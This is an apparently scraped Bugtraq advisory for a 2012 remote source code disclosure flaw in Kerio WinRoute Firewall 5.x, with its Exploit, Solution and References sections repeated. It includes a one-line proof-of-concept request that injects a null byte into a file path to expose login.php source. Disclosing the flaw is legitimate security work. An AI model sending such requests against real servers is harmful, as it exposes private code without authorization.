Kerio WinRoute Firewall Web Server Remote Source Code Disclosure Vulnerability
BID:53460
Info
Kerio WinRoute Firewall Web Server Remote Source Code Disclosure Vulnerability
| Bugtraq ID: | 53460 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 10 2012 12:00AM |
| Updated: | May 10 2012 12:00AM |
| Credit: | Andrey Komarov |
| Vulnerable: |
Kerio WinRoute Firewall 5.10 Kerio WinRoute Firewall 5.1.10 Kerio WinRoute Firewall 5.1.9 Kerio WinRoute Firewall 5.1.8 Kerio WinRoute Firewall 5.1.7 Kerio WinRoute Firewall 5.1.6 Kerio WinRoute Firewall 5.1.5 Kerio WinRoute Firewall 5.1.4 Kerio WinRoute Firewall 5.1.3 Kerio WinRoute Firewall 5.1.2 Kerio WinRoute Firewall 5.1.1 Kerio WinRoute Firewall 5.1 Kerio WinRoute Firewall 5.0.9 Kerio WinRoute Firewall 5.0.8 Kerio WinRoute Firewall 5.0.7 Kerio WinRoute Firewall 5.0.6 Kerio WinRoute Firewall 5.0.5 Kerio WinRoute Firewall 5.0.4 Kerio WinRoute Firewall 5.0.3 Kerio WinRoute Firewall 5.0.2 Kerio WinRoute Firewall 5.0.1 |
| Not Vulnerable: |
Kerio WinRoute Firewall 6.0 |
Exploit / POC
Kerio WinRoute Firewall Web Server Remote Source Code Disclosure Vulnerability
Attackers can exploit this issue with a browser.
The following example data is available:
GET /nonauth/login.phpNULL_BYTE.txt HTTP/1.1
Attackers can exploit this issue with a browser.
The following example data is available:
GET /nonauth/login.phpNULL_BYTE.txt HTTP/1.1
Solution / Fix
Kerio WinRoute Firewall Web Server Remote Source Code Disclosure Vulnerability
Solution:
Updates are available. Please see the references for more details.
Solution:
Updates are available. Please see the references for more details.
References
Kerio WinRoute Firewall Web Server Remote Source Code Disclosure Vulnerability
References:
References:
- Kerio Homepage (Kerio)